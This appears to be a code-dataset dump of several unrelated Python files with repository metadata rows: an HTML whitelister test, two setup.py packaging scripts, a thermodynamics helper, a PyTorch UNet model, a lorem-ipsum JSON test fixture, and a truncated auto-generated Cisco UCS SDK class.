output_html = Whitelister.clean(input_html)
expected = 'I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1">stand in water</a>.<p>- Gumby</p>'
self.assertHtmlEqual(expected, output_html)
| 75.431373 | 326 | 0.707824 |
795b965beca6ef8b993a4c5b0802fc81010eecc6 | 1,955 | py | Python | setup.py | aaronbiller/spackl | 71906a3da6470f67bff19c42bd0f1f8748c5056f | [
"MIT"
] | null | null | null | setup.py | aaronbiller/spackl | 71906a3da6470f67bff19c42bd0f1f8748c5056f | [
"MIT"
] | null | null | null | setup.py | aaronbiller/spackl | 71906a3da6470f67bff19c42bd0f1f8748c5056f | [
"MIT"
] | null | null | null | import re
from io import open
from setuptools import setup, find_packages
README = 'README.md'
CHANGES = 'CHANGES.md'
VERSION_FILE = 'spackl/__init__.py'
def read(path):
with open(path, encoding='utf-8') as f:
return f.read()
def find_version():
version_file = read(VERSION_FILE)
version_match = re.search(
r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file,
re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='spackl',
version=find_version(),
author='Aaron Biller',
author_email='aaronbiller@gmail.com',
description='Utility for unified querying across data sources',
long_description=read(README) + '\n' + read(CHANGES),
long_description_content_type='text/markdown',
license='MIT',
keywords='utility query database csv file',
url='https://github.com/aaronbiller/spackl',
packages=find_packages(),
tests_require=[
'pytest',
'pytest-cov',
'mock',
],
install_requires=[
'future==0.16.0',
'google-cloud-bigquery==1.5.0',
'psycopg2-binary==2.7.5',
'PyYAML',
'SQLAlchemy==1.2.11',
'sqlalchemy-redshift==0.7.1',
'pandas>=0.22.0',
'pytest-runner==4.2',
],
extras_require={
':python_version == "2.7"': [
'pathlib2==2.3.2',
],
},
include_package_data=True,
scripts=[],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Database',
'Topic :: Utilities',
],
)
| 26.066667 | 67 | 0.582097 |
795b96adabb64d1e14a3cff35e3c25886eb06aac | 712 | py | Python | setup.py | neurospin/deep_folding | 4c580314dfa4ae87c5d115f211c42185ae183f64 | [
"CECILL-B"
] | 1 | 2021-10-06T06:47:53.000Z | 2021-10-06T06:47:53.000Z | setup.py | neurospin/deep_folding | 4c580314dfa4ae87c5d115f211c42185ae183f64 | [
"CECILL-B"
] | 5 | 2021-04-19T07:12:33.000Z | 2022-01-14T14:53:22.000Z | setup.py | neurospin/deep_folding | 4c580314dfa4ae87c5d115f211c42185ae183f64 | [
"CECILL-B"
] | 2 | 2021-09-09T11:39:08.000Z | 2021-09-09T12:29:34.000Z | import os
from setuptools import setup, find_packages
release_info = {}
python_dir = os.path.dirname(__file__)
with open(os.path.join(python_dir, "deep_folding", "info.py")) as f:
code = f.read()
exec(code, release_info)
setup(
name=release_info['NAME'],
version=release_info['__version__'],
packages=find_packages(exclude=['tests*', 'notebooks*']),
license=release_info['LICENSE'],
description=release_info['DESCRIPTION'],
long_description=open('README.rst').read(),
install_requires=release_info["REQUIRES"],
extras_require=release_info["EXTRA_REQUIRES"],
url=release_info['URL'],
author=release_info['AUTHOR'],
author_email=release_info['AUTHOR_EMAIL']
)
| 30.956522 | 68 | 0.717697 |
795b980937c88934f44a01a256940bf5374f04ab | 370 | py | Python | thermosteam/equilibrium/ideal.py | yoelcortes/thermotree | 7d7c045ed7324ff7fd69188f3176207be08d7070 | [
"MIT"
] | 2 | 2020-01-10T14:23:08.000Z | 2020-02-21T20:36:49.000Z | thermosteam/equilibrium/ideal.py | yoelcortes/thermotree | 7d7c045ed7324ff7fd69188f3176207be08d7070 | [
"MIT"
] | 3 | 2019-12-09T08:10:41.000Z | 2019-12-09T08:40:52.000Z | thermosteam/equilibrium/ideal.py | yoelcortes/thermotree | 7d7c045ed7324ff7fd69188f3176207be08d7070 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 29 08:43:40 2021
@author: yrc2
"""
from numba import njit
__all__ = ('ideal_coefficient',)
def ideal(cls):
cls.f = ideal_coefficient
cls.args = ()
return cls
@property
def ideal_coefficient(self):
return _ideal_coefficient
@njit(cache=True)
def _ideal_coefficient(z=None, T=None, P=None):
return 1. | 16.818182 | 47 | 0.675676 |
795b983029de527b4d18fc59e6ae285d2b68ce73 | 1,643 | py | Python | Maria/federated_segmentation_unet_pneumo/model.py | anirbansen3027/UdacityOpenSource | c032f610a7861c234e189841f996bff877c94e34 | [
"Apache-2.0"
] | 2 | 2019-08-19T19:16:59.000Z | 2020-09-03T19:18:27.000Z | Maria/federated_segmentation_unet_pneumo/model.py | anirbansen3027/UdacityOpenSource | c032f610a7861c234e189841f996bff877c94e34 | [
"Apache-2.0"
] | null | null | null | Maria/federated_segmentation_unet_pneumo/model.py | anirbansen3027/UdacityOpenSource | c032f610a7861c234e189841f996bff877c94e34 | [
"Apache-2.0"
] | 1 | 2019-08-20T13:14:59.000Z | 2019-08-20T13:14:59.000Z | # https://github.com/usuyama/pytorch-unet
import torch
from torch import nn
def double_conv(in_channels, out_channels):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, 3, padding=1),
nn.ReLU(inplace=True)
)
class UNet(nn.Module):
def __init__(self, n_class):
super().__init__()
self.dconv_down1 = double_conv(3, 64)
self.dconv_down2 = double_conv(64, 128)
self.dconv_down3 = double_conv(128, 256)
self.dconv_down4 = double_conv(256, 512)
self.maxpool = nn.MaxPool2d(2)
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.dconv_up3 = double_conv(256 + 512, 256)
self.dconv_up2 = double_conv(128 + 256, 128)
self.dconv_up1 = double_conv(128 + 64, 64)
self.conv_last = nn.Conv2d(64, n_class, 1)
def forward(self, x):
conv1 = self.dconv_down1(x)
x = self.maxpool(conv1)
conv2 = self.dconv_down2(x)
x = self.maxpool(conv2)
conv3 = self.dconv_down3(x)
x = self.maxpool(conv3)
x = self.dconv_down4(x)
x = self.upsample(x)
x = torch.cat([x, conv3], dim=1)
x = self.dconv_up3(x)
x = self.upsample(x)
x = torch.cat([x, conv2], dim=1)
x = self.dconv_up2(x)
x = self.upsample(x)
x = torch.cat([x, conv1], dim=1)
x = self.dconv_up1(x)
out = self.conv_last(x)
return out | 34.229167 | 92 | 0.570298 |
795b98a5af239e4c9c124fb4c6d75935151d2f06 | 4,416 | py | Python | tests/data/until_12_999.py | GTmmiller/TurkeyVulture | 4481d04d0e210b6058573afdacc2c089ed8bbeb5 | [
"Apache-2.0"
] | null | null | null | tests/data/until_12_999.py | GTmmiller/TurkeyVulture | 4481d04d0e210b6058573afdacc2c089ed8bbeb5 | [
"Apache-2.0"
] | null | null | null | tests/data/until_12_999.py | GTmmiller/TurkeyVulture | 4481d04d0e210b6058573afdacc2c089ed8bbeb5 | [
"Apache-2.0"
] | null | null | null | JSON = {
"id": "999",
"to": {
"data": [
{
"id": "1",
"name": "Person One"
},
{
"id": "2",
"name": "Person Two"
},
{
"id": "3",
"name": "Person Three"
},
{
"id": "4",
"name": "Person Four"
},
{
"id": "5",
"name": "Person Five"
},
{
"id": "6",
"name": "Person Six"
},
{
"id": "7",
"name": "Person Seven"
},
{
"id": "8",
"name": "Person Eight"
}
]
},
"updated_time": "2010-01-23T14:00:00+0000",
"unread": 0,
"unseen": 0,
"comments": {
"data": [
{
"id": "999_1",
"from": {
"id": "8",
"name": "Person Eight"
},
"message": "Sed aliquam ultrices mauris.",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_2",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Duis arcu tortor, suscipit eget, imperdiet nec, imperdiet iaculis, ipsum",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_3",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Nam pretium turpis et arcu",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_4",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; In ac dui quis mi consectetuer lacinia",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_5",
"from": {
"id": "2",
"name": "Person Two"
},
"message": "Cras ultricies mi eu turpis hendrerit fringilla",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_6",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Nullam accumsan lorem in dui.",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_7",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Vestibulum purus quam, scelerisque ut, mollis sed, nonummy id, metus",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_8",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Fusce vulputate eleifend sapien",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_9",
"from": {
"id": "2",
"name": "Person Two"
},
"message": "Sed consequat, leo eget bibendum sodales, augue velit cursus nunc, quis gravida magna mi a libero",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_10",
"from": {
"id": "5",
"name": "Person Five"
},
"message": "Donec sodales sagittis magna",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_11",
"from": {
"id": "3",
"name": "Person 3"
},
"message": "Sed fringilla mauris sit amet nibh",
"created_time": "2010-01-23T14:00:00+0000"
}
],
"paging": {
"previous": "https://graph.facebook.com/v2.3/999/comments?limit=25&__paging_token=enc_ABC123PLACeHolDer&access_token=placeholder&since=11&__previous=1",
"next": "https://graph.facebook.com/v2.3/999/comments?limit=25&__paging_token=enc_AxccviosOthErPLaCEHoLDer&access_token=placeholder&until=1"
}
}
} | 29.637584 | 162 | 0.380208 |
795b98d54c49199771ccdbd82ce39b2ffac54da8 | 18,776 | py | Python | ucsmsdk/mometa/equipment/EquipmentSwitchIOCardFsm.py | Curlyfingers/ucsmsdk | 982ff2d8faa12ffb88e1f8cba98cf5749f05c93d | [
"Apache-2.0"
] | null | null | null | ucsmsdk/mometa/equipment/EquipmentSwitchIOCardFsm.py | Curlyfingers/ucsmsdk | 982ff2d8faa12ffb88e1f8cba98cf5749f05c93d | [
"Apache-2.0"
] | null | null | null | ucsmsdk/mometa/equipment/EquipmentSwitchIOCardFsm.py | Curlyfingers/ucsmsdk | 982ff2d8faa12ffb88e1f8cba98cf5749f05c93d | [
"Apache-2.0"
] | null | null | null | """This module contains the general information for EquipmentSwitchIOCardFsm ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentSwitchIOCardFsmConsts:
COMPLETION_TIME_ = ""
CURRENT_FSM_EVACUATE = "Evacuate"
CURRENT_FSM_FE_CONN = "FeConn"
CURRENT_FSM_FE_PRESENCE = "FePresence"
CURRENT_FSM_RESET_EVACUATE = "ResetEvacuate"
CURRENT_FSM_NOP = "nop"
FSM_STATUS_FAIL = "fail"
FSM_STATUS_IN_PROGRESS = "inProgress"
FSM_STATUS_NOP = "nop"
FSM_STATUS_PENDING = "pending"
FSM_STATUS_SKIP = "skip"
FSM_STATUS_SUCCESS = "success"
FSM_STATUS_THROTTLED = "throttled"
RMT_ERR_CODE_ERR_2FA_AUTH_RETRY = "ERR-2fa-auth-retry"
RMT_ERR_CODE_ERR_ACTIVATE_FAILED = "ERR-ACTIVATE-failed"
RMT_ERR_CODE_ERR_ACTIVATE_IN_PROGRESS = "ERR-ACTIVATE-in-progress"
RMT_ERR_CODE_ERR_ACTIVATE_RETRY = "ERR-ACTIVATE-retry"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_BIOS = "ERR-BIOS-TOKENS-OLD-BIOS"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_CIMC = "ERR-BIOS-TOKENS-OLD-CIMC"
RMT_ERR_CODE_ERR_BIOS_NETWORK_BOOT_ORDER_NOT_FOUND = "ERR-BIOS-network-boot-order-not-found"
RMT_ERR_CODE_ERR_BOARDCTRLUPDATE_IGNORE = "ERR-BOARDCTRLUPDATE-ignore"
RMT_ERR_CODE_ERR_DIAG_CANCELLED = "ERR-DIAG-cancelled"
RMT_ERR_CODE_ERR_DIAG_FSM_RESTARTED = "ERR-DIAG-fsm-restarted"
RMT_ERR_CODE_ERR_DIAG_TEST_FAILED = "ERR-DIAG-test-failed"
RMT_ERR_CODE_ERR_DNLD_AUTHENTICATION_FAILURE = "ERR-DNLD-authentication-failure"
RMT_ERR_CODE_ERR_DNLD_HOSTKEY_MISMATCH = "ERR-DNLD-hostkey-mismatch"
RMT_ERR_CODE_ERR_DNLD_INVALID_IMAGE = "ERR-DNLD-invalid-image"
RMT_ERR_CODE_ERR_DNLD_NO_FILE = "ERR-DNLD-no-file"
RMT_ERR_CODE_ERR_DNLD_NO_SPACE = "ERR-DNLD-no-space"
RMT_ERR_CODE_ERR_DNLD_USB_UNMOUNTED = "ERR-DNLD-usb-unmounted"
RMT_ERR_CODE_ERR_DNS_DELETE_ERROR = "ERR-DNS-delete-error"
RMT_ERR_CODE_ERR_DNS_GET_ERROR = "ERR-DNS-get-error"
RMT_ERR_CODE_ERR_DNS_SET_ERROR = "ERR-DNS-set-error"
RMT_ERR_CODE_ERR_DIAGNOSTICS_IN_PROGRESS = "ERR-Diagnostics-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_MEMTEST_IN_PROGRESS = "ERR-Diagnostics-memtest-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_NETWORK_IN_PROGRESS = "ERR-Diagnostics-network-in-progress"
RMT_ERR_CODE_ERR_FILTER_ILLEGAL_FORMAT = "ERR-FILTER-illegal-format"
RMT_ERR_CODE_ERR_FSM_NO_SUCH_STATE = "ERR-FSM-no-such-state"
RMT_ERR_CODE_ERR_HOST_FRU_IDENTITY_MISMATCH = "ERR-HOST-fru-identity-mismatch"
RMT_ERR_CODE_ERR_HTTP_SET_ERROR = "ERR-HTTP-set-error"
RMT_ERR_CODE_ERR_HTTPS_SET_ERROR = "ERR-HTTPS-set-error"
RMT_ERR_CODE_ERR_IBMC_ANALYZE_RESULTS = "ERR-IBMC-analyze-results"
RMT_ERR_CODE_ERR_IBMC_CONNECT_ERROR = "ERR-IBMC-connect-error"
RMT_ERR_CODE_ERR_IBMC_CONNECTOR_INFO_RETRIEVAL_ERROR = "ERR-IBMC-connector-info-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_FRU_RETRIEVAL_ERROR = "ERR-IBMC-fru-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_INVALID_END_POINT_CONFIG = "ERR-IBMC-invalid-end-point-config"
RMT_ERR_CODE_ERR_IBMC_RESULTS_NOT_READY = "ERR-IBMC-results-not-ready"
RMT_ERR_CODE_ERR_MAX_SUBSCRIPTIONS_ALLOWED_ERROR = "ERR-MAX-subscriptions-allowed-error"
RMT_ERR_CODE_ERR_MO_CONFIG_CHILD_OBJECT_CANT_BE_CONFIGURED = "ERR-MO-CONFIG-child-object-cant-be-configured"
RMT_ERR_CODE_ERR_MO_META_NO_SUCH_OBJECT_CLASS = "ERR-MO-META-no-such-object-class"
RMT_ERR_CODE_ERR_MO_PROPERTY_NO_SUCH_PROPERTY = "ERR-MO-PROPERTY-no-such-property"
RMT_ERR_CODE_ERR_MO_PROPERTY_VALUE_OUT_OF_RANGE = "ERR-MO-PROPERTY-value-out-of-range"
RMT_ERR_CODE_ERR_MO_ACCESS_DENIED = "ERR-MO-access-denied"
RMT_ERR_CODE_ERR_MO_DELETION_RULE_VIOLATION = "ERR-MO-deletion-rule-violation"
RMT_ERR_CODE_ERR_MO_DUPLICATE_OBJECT = "ERR-MO-duplicate-object"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CONTAINMENT = "ERR-MO-illegal-containment"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CREATION = "ERR-MO-illegal-creation"
RMT_ERR_CODE_ERR_MO_ILLEGAL_ITERATOR_STATE = "ERR-MO-illegal-iterator-state"
RMT_ERR_CODE_ERR_MO_ILLEGAL_OBJECT_LIFECYCLE_TRANSITION = "ERR-MO-illegal-object-lifecycle-transition"
RMT_ERR_CODE_ERR_MO_NAMING_RULE_VIOLATION = "ERR-MO-naming-rule-violation"
RMT_ERR_CODE_ERR_MO_OBJECT_NOT_FOUND = "ERR-MO-object-not-found"
RMT_ERR_CODE_ERR_MO_RESOURCE_ALLOCATION = "ERR-MO-resource-allocation"
RMT_ERR_CODE_ERR_NTP_DELETE_ERROR = "ERR-NTP-delete-error"
RMT_ERR_CODE_ERR_NTP_GET_ERROR = "ERR-NTP-get-error"
RMT_ERR_CODE_ERR_NTP_SET_ERROR = "ERR-NTP-set-error"
RMT_ERR_CODE_ERR_POWER_CAP_UNSUPPORTED = "ERR-POWER-CAP-UNSUPPORTED"
RMT_ERR_CODE_ERR_POWER_PROFILE_IN_PROGRESS = "ERR-POWER-PROFILE-IN-PROGRESS"
RMT_ERR_CODE_ERR_SERVER_MIS_CONNECT = "ERR-SERVER-mis-connect"
RMT_ERR_CODE_ERR_SWITCH_INVALID_IF_CONFIG = "ERR-SWITCH-invalid-if-config"
RMT_ERR_CODE_ERR_TOKEN_REQUEST_DENIED = "ERR-TOKEN-request-denied"
RMT_ERR_CODE_ERR_UNABLE_TO_FETCH_BIOS_SETTINGS = "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS"
RMT_ERR_CODE_ERR_UPDATE_FAILED = "ERR-UPDATE-failed"
RMT_ERR_CODE_ERR_UPDATE_IN_PROGRESS = "ERR-UPDATE-in-progress"
RMT_ERR_CODE_ERR_UPDATE_RETRY = "ERR-UPDATE-retry"
RMT_ERR_CODE_ERR_AAA_CONFIG_MODIFY_ERROR = "ERR-aaa-config-modify-error"
RMT_ERR_CODE_ERR_ACCT_REALM_SET_ERROR = "ERR-acct-realm-set-error"
RMT_ERR_CODE_ERR_ADMIN_PASSWD_SET = "ERR-admin-passwd-set"
RMT_ERR_CODE_ERR_AUTH_ISSUE = "ERR-auth-issue"
RMT_ERR_CODE_ERR_AUTH_REALM_GET_ERROR = "ERR-auth-realm-get-error"
RMT_ERR_CODE_ERR_AUTH_REALM_SET_ERROR = "ERR-auth-realm-set-error"
RMT_ERR_CODE_ERR_AUTHENTICATION = "ERR-authentication"
RMT_ERR_CODE_ERR_AUTHORIZATION_REQUIRED = "ERR-authorization-required"
RMT_ERR_CODE_ERR_CLI_SESSION_LIMIT_REACHED = "ERR-cli-session-limit-reached"
RMT_ERR_CODE_ERR_CREATE_KEYRING = "ERR-create-keyring"
RMT_ERR_CODE_ERR_CREATE_LOCALE = "ERR-create-locale"
RMT_ERR_CODE_ERR_CREATE_ROLE = "ERR-create-role"
RMT_ERR_CODE_ERR_CREATE_TP = "ERR-create-tp"
RMT_ERR_CODE_ERR_CREATE_USER = "ERR-create-user"
RMT_ERR_CODE_ERR_DELETE_LOCALE = "ERR-delete-locale"
RMT_ERR_CODE_ERR_DELETE_ROLE = "ERR-delete-role"
RMT_ERR_CODE_ERR_DELETE_SESSION = "ERR-delete-session"
RMT_ERR_CODE_ERR_DELETE_USER = "ERR-delete-user"
RMT_ERR_CODE_ERR_DOWNGRADE_FAIL = "ERR-downgrade-fail"
RMT_ERR_CODE_ERR_EFI_DIAGNOSTICS_IN_PROGRESS = "ERR-efi-Diagnostics--in-progress"
RMT_ERR_CODE_ERR_ENABLE_MGMT_CONN = "ERR-enable-mgmt-conn"
RMT_ERR_CODE_ERR_EP_SET_ERROR = "ERR-ep-set-error"
RMT_ERR_CODE_ERR_GET_MAX_HTTP_USER_SESSIONS = "ERR-get-max-http-user-sessions"
RMT_ERR_CODE_ERR_HTTP_INITIALIZING = "ERR-http-initializing"
RMT_ERR_CODE_ERR_INSUFFICIENTLY_EQUIPPED = "ERR-insufficiently-equipped"
RMT_ERR_CODE_ERR_INTERNAL_ERROR = "ERR-internal-error"
RMT_ERR_CODE_ERR_LDAP_DELETE_ERROR = "ERR-ldap-delete-error"
RMT_ERR_CODE_ERR_LDAP_GET_ERROR = "ERR-ldap-get-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_MODIFY_ERROR = "ERR-ldap-group-modify-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_SET_ERROR = "ERR-ldap-group-set-error"
RMT_ERR_CODE_ERR_LDAP_SET_ERROR = "ERR-ldap-set-error"
RMT_ERR_CODE_ERR_LOCALE_SET_ERROR = "ERR-locale-set-error"
RMT_ERR_CODE_ERR_MAX_USERID_SESSIONS_REACHED = "ERR-max-userid-sessions-reached"
RMT_ERR_CODE_ERR_MISSING_METHOD = "ERR-missing-method"
RMT_ERR_CODE_ERR_MODIFY_LOCALE = "ERR-modify-locale"
RMT_ERR_CODE_ERR_MODIFY_ROLE = "ERR-modify-role"
RMT_ERR_CODE_ERR_MODIFY_USER = "ERR-modify-user"
RMT_ERR_CODE_ERR_MODIFY_USER_LOCALE = "ERR-modify-user-locale"
RMT_ERR_CODE_ERR_MODIFY_USER_ROLE = "ERR-modify-user-role"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_MODIFY_ERROR = "ERR-provider-group-modify-error"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_SET_ERROR = "ERR-provider-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_GET_ERROR = "ERR-radius-get-error"
RMT_ERR_CODE_ERR_RADIUS_GLOBAL_SET_ERROR = "ERR-radius-global-set-error"
RMT_ERR_CODE_ERR_RADIUS_GROUP_SET_ERROR = "ERR-radius-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_SET_ERROR = "ERR-radius-set-error"
RMT_ERR_CODE_ERR_REQUEST_TIMEOUT = "ERR-request-timeout"
RMT_ERR_CODE_ERR_RESET_ADAPTER = "ERR-reset-adapter"
RMT_ERR_CODE_ERR_ROLE_SET_ERROR = "ERR-role-set-error"
RMT_ERR_CODE_ERR_SECONDARY_NODE = "ERR-secondary-node"
RMT_ERR_CODE_ERR_SERVICE_NOT_READY = "ERR-service-not-ready"
RMT_ERR_CODE_ERR_SESSION_CACHE_FULL = "ERR-session-cache-full"
RMT_ERR_CODE_ERR_SESSION_NOT_FOUND = "ERR-session-not-found"
RMT_ERR_CODE_ERR_SET_KEY_CERT = "ERR-set-key-cert"
RMT_ERR_CODE_ERR_SET_LOGIN_PROFILE = "ERR-set-login-profile"
RMT_ERR_CODE_ERR_SET_MIN_PASSPHRASE_LENGTH = "ERR-set-min-passphrase-length"
RMT_ERR_CODE_ERR_SET_NETWORK = "ERR-set-network"
RMT_ERR_CODE_ERR_SET_PASSWORD_STRENGTH_CHECK = "ERR-set-password-strength-check"
RMT_ERR_CODE_ERR_SET_PORT_CHANNEL = "ERR-set-port-channel"
RMT_ERR_CODE_ERR_STORE_PRE_LOGIN_BANNER_MSG = "ERR-store-pre-login-banner-msg"
RMT_ERR_CODE_ERR_TACACS_ENABLE_ERROR = "ERR-tacacs-enable-error"
RMT_ERR_CODE_ERR_TACACS_GLOBAL_SET_ERROR = "ERR-tacacs-global-set-error"
RMT_ERR_CODE_ERR_TACACS_GROUP_SET_ERROR = "ERR-tacacs-group-set-error"
RMT_ERR_CODE_ERR_TACACS_PLUS_GET_ERROR = "ERR-tacacs-plus-get-error"
RMT_ERR_CODE_ERR_TACACS_SET_ERROR = "ERR-tacacs-set-error"
RMT_ERR_CODE_ERR_TEST_ERROR_1 = "ERR-test-error-1"
RMT_ERR_CODE_ERR_TEST_ERROR_2 = "ERR-test-error-2"
RMT_ERR_CODE_ERR_TIMEZONE_SET_ERROR = "ERR-timezone-set-error"
RMT_ERR_CODE_ERR_USER_ACCOUNT_EXPIRED = "ERR-user-account-expired"
RMT_ERR_CODE_ERR_USER_SET_ERROR = "ERR-user-set-error"
RMT_ERR_CODE_ERR_XML_PARSE_ERROR = "ERR-xml-parse-error"
RMT_ERR_CODE_NONE = "none"
class EquipmentSwitchIOCardFsm(ManagedObject):
"""This is EquipmentSwitchIOCardFsm class."""
consts = EquipmentSwitchIOCardFsmConsts()
naming_props = set([])
mo_meta = MoMeta("EquipmentSwitchIOCardFsm", "equipmentSwitchIOCardFsm", "fsm", VersionMeta.Version302c, "OutputOnly", 0xf, [], [""], [u'equipmentSwitchIOCard'], [u'equipmentSwitchIOCardFsmStage'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version302c, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"completion_time": MoPropertyMeta("completion_time", "completionTime", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [""], []),
"current_fsm": MoPropertyMeta("current_fsm", "currentFsm", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["Evacuate", "FeConn", "FePresence", "ResetEvacuate", "nop"], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"fsm_status": MoPropertyMeta("fsm_status", "fsmStatus", "string", VersionMeta.Version302c, MoPropertyMeta.INTERNAL, None, None, None, None, ["fail", "inProgress", "nop", "pending", "skip", "success", "throttled"], []),
"instance_id": MoPropertyMeta("instance_id", "instanceId", "uint", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "byte", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], ["0-100"]),
"rmt_err_code": MoPropertyMeta("rmt_err_code", "rmtErrCode", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["ERR-2fa-auth-retry", "ERR-ACTIVATE-failed", "ERR-ACTIVATE-in-progress", "ERR-ACTIVATE-retry", "ERR-BIOS-TOKENS-OLD-BIOS", "ERR-BIOS-TOKENS-OLD-CIMC", "ERR-BIOS-network-boot-order-not-found", "ERR-BOARDCTRLUPDATE-ignore", "ERR-DIAG-cancelled", "ERR-DIAG-fsm-restarted", "ERR-DIAG-test-failed", "ERR-DNLD-authentication-failure", "ERR-DNLD-hostkey-mismatch", "ERR-DNLD-invalid-image", "ERR-DNLD-no-file", "ERR-DNLD-no-space", "ERR-DNLD-usb-unmounted", "ERR-DNS-delete-error", "ERR-DNS-get-error", "ERR-DNS-set-error", "ERR-Diagnostics-in-progress", "ERR-Diagnostics-memtest-in-progress", "ERR-Diagnostics-network-in-progress", "ERR-FILTER-illegal-format", "ERR-FSM-no-such-state", "ERR-HOST-fru-identity-mismatch", "ERR-HTTP-set-error", "ERR-HTTPS-set-error", "ERR-IBMC-analyze-results", "ERR-IBMC-connect-error", "ERR-IBMC-connector-info-retrieval-error", "ERR-IBMC-fru-retrieval-error", "ERR-IBMC-invalid-end-point-config", "ERR-IBMC-results-not-ready", "ERR-MAX-subscriptions-allowed-error", "ERR-MO-CONFIG-child-object-cant-be-configured", "ERR-MO-META-no-such-object-class", "ERR-MO-PROPERTY-no-such-property", "ERR-MO-PROPERTY-value-out-of-range", "ERR-MO-access-denied", "ERR-MO-deletion-rule-violation", "ERR-MO-duplicate-object", "ERR-MO-illegal-containment", "ERR-MO-illegal-creation", "ERR-MO-illegal-iterator-state", "ERR-MO-illegal-object-lifecycle-transition", "ERR-MO-naming-rule-violation", "ERR-MO-object-not-found", "ERR-MO-resource-allocation", "ERR-NTP-delete-error", "ERR-NTP-get-error", "ERR-NTP-set-error", "ERR-POWER-CAP-UNSUPPORTED", "ERR-POWER-PROFILE-IN-PROGRESS", "ERR-SERVER-mis-connect", "ERR-SWITCH-invalid-if-config", "ERR-TOKEN-request-denied", "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS", "ERR-UPDATE-failed", "ERR-UPDATE-in-progress", "ERR-UPDATE-retry", "ERR-aaa-config-modify-error", "ERR-acct-realm-set-error", "ERR-admin-passwd-set", "ERR-auth-issue", "ERR-auth-realm-get-error", "ERR-auth-realm-set-error", "ERR-authentication", "ERR-authorization-required", "ERR-cli-session-limit-reached", "ERR-create-keyring", "ERR-create-locale", "ERR-create-role", "ERR-create-tp", "ERR-create-user", "ERR-delete-locale", "ERR-delete-role", "ERR-delete-session", "ERR-delete-user", "ERR-downgrade-fail", "ERR-efi-Diagnostics--in-progress", "ERR-enable-mgmt-conn", "ERR-ep-set-error", "ERR-get-max-http-user-sessions", "ERR-http-initializing", "ERR-insufficiently-equipped", "ERR-internal-error", "ERR-ldap-delete-error", "ERR-ldap-get-error", "ERR-ldap-group-modify-error", "ERR-ldap-group-set-error", "ERR-ldap-set-error", "ERR-locale-set-error", "ERR-max-userid-sessions-reached", "ERR-missing-method", "ERR-modify-locale", "ERR-modify-role", "ERR-modify-user", "ERR-modify-user-locale", "ERR-modify-user-role", "ERR-provider-group-modify-error", "ERR-provider-group-set-error", "ERR-radius-get-error", "ERR-radius-global-set-error", "ERR-radius-group-set-error", "ERR-radius-set-error", "ERR-request-timeout", "ERR-reset-adapter", "ERR-role-set-error", "ERR-secondary-node", "ERR-service-not-ready", 